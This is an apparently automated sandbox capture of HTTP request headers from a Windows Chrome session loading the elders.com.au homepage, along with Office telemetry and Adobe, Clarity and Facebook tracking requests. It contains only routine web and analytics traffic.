Source: global trafficHTTP traffic detected: GET /s/0.7.53/clarity.js HTTP/1.1Host: www.clarity.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CLID=a7d61f4104e24a3ab7dd66c7c8abcd4a.20241105.20251105
Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-right-chevron-red.svg HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://elders.com.ausec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: imageReferer: https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-site.lc-b12902665e7f329d47d0e56b8a41e8e6-lc.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: affinity="e47c197095b8b7ee"
Source: global trafficHTTP traffic detected: GET /etc.clientlibs/aap2/aap2-core/clientlibs/v2/ax-fx-clientlibs-body.lc-977e7ec6e7e29a59f7dfd9cd0ac2f4b3-lc.min.js HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: affinity="e47c197095b8b7ee"
Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /etc.clientlibs/clientlibs/granite/jquery.lc-f9e8e8c279baf6a1a278042afe4f395a-lc.min.js HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: affinity="e47c197095b8b7ee"
Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/icons/icon_farm_supplies.png HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: affinity="e47c197095b8b7ee"; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CvVersion%7C5.5.0
Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-chevron-left.svg HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: affinity="e47c197095b8b7ee"; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CvVersion%7C5.5.0
Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/icons/teamwork-icon.png HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: affinity="e47c197095b8b7ee"; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CvVersion%7C5.5.0
Source: global trafficHTTP traffic detected: GET /content/dam/eld/images/homepage-banners/rpu_q2_2024_landingpagebanner.jpg HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: affinity="e47c197095b8b7ee"; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CvVersion%7C5.5.0
Source: global trafficHTTP traffic detected: GET /etc.clientlibs/clientlibs/granite/utils.lc-899004cc02c33efc1f6694b1aee587fd-lc.min.js HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: affinity="e47c197095b8b7ee"
Source: global trafficHTTP traffic detected: GET /id?d_visid_ver=5.5.0&d_fieldgroup=MC&d_rtbd=json&d_ver=2&d_orgid=812E14B761A133470A495CCA%40AdobeOrg&d_nsid=0&ts=1730793803403 HTTP/1.1Host: dpm.demdex.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: */*Origin: https://elders.com.auSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /etc.clientlibs/clientlibs/granite/jquery/granite.lc-011c0fc0d0cf131bdff879743a353002-lc.min.js HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: affinity="e47c197095b8b7ee"
Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/icons/Livestock.png HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: affinity="e47c197095b8b7ee"; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CvVersion%7C5.5.0
Source: global trafficHTTP traffic detected: GET /etc.clientlibs/foundation/clientlibs/jquery.lc-dd9b395c741ce2784096e26619e14910-lc.min.js HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: affinity="e47c197095b8b7ee"; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CvVersion%7C5.5.0
Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-react.lc-2d7df618eb528a2ce626641aaccea776-lc.min.js HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"
Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-right-chevron-red.svg HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"
Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/icons/find-expert.png HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"
Source: global trafficHTTP traffic detected: GET /etc.clientlibs/clientlibs/granite/utils.lc-899004cc02c33efc1f6694b1aee587fd-lc.min.js HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"
Source: global trafficHTTP traffic detected: GET /etc.clientlibs/core/wcm/components/commons/site/clientlibs/container.lc-0a6aff292f5cc42142779cde92054524-lc.min.js HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"
Source: global trafficHTTP traffic detected: GET /etc.clientlibs/clientlibs/granite/jquery/granite.lc-011c0fc0d0cf131bdff879743a353002-lc.min.js HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"
Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-base.lc-e592021eafd59de123415ab937a09f08-lc.min.js HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"
Source: global trafficHTTP traffic detected: GET /content/dam/eld/images/homepage-banners/modern_home.jpg HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F
Source: global trafficHTTP traffic detected: GET /s/0.7.53/clarity.js HTTP/1.1Host: www.clarity.msConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CLID=a7d61f4104e24a3ab7dd66c7c8abcd4a.20241105.20251105
Source: global trafficHTTP traffic detected: GET /content/dam/eld/images/livestocknow/close_up_ram_head_horns.png HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; s_cc=true
Source: global trafficHTTP traffic detected: GET /id?d_visid_ver=5.5.0&d_fieldgroup=MC&d_rtbd=json&d_ver=2&d_orgid=812E14B761A133470A495CCA%40AdobeOrg&d_nsid=0&ts=1730793803403 HTTP/1.1Host: dpm.demdex.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: demdex=50828223440744139920245021373270661928
Source: global trafficHTTP traffic detected: GET /content/dam/eld/images/homepage-banners/staff_background_wheat.jpg HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; s_cc=true
Source: global trafficHTTP traffic detected: GET /signals/config/1013340413305983?v=2.9.176&r=stable&domain=elders.com.au&hme=872f04a0547459b3285cb03b0d7a47bfde40628f4b386809918a621e2688602f&ex_m=70%2C121%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C172%2C175%2C187%2C183%2C184%2C186%2C29%2C101%2C53%2C77%2C185%2C167%2C170%2C180%2C181%2C188%2C131%2C41%2C189%2C190%2C34%2C143%2C15%2C50%2C195%2C194%2C133%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C168%2C171%2C140%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113 HTTP/1.1Host: connect.facebook.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tr/?id=1013340413305983&ev=PageView&dl=https%3A%2F%2Felders.com.au%2F&rl=https%3A%2F%2Fastonishing-maize-sunstone.glitch.me%2F&if=false&ts=1730793804756&sw=1280&sh=1024&v=2.9.176&r=stable&ec=0&o=4126&fbp=fb.2.1730793804748.70395038985089435&cs_est=true&ler=other&cdl=API_unavailable&it=1730793802669&coo=false&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /dest5.html?d_nsid=0 HTTP/1.1Host: eldersrural.demdex.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: demdex=50828223440744139920245021373270661928
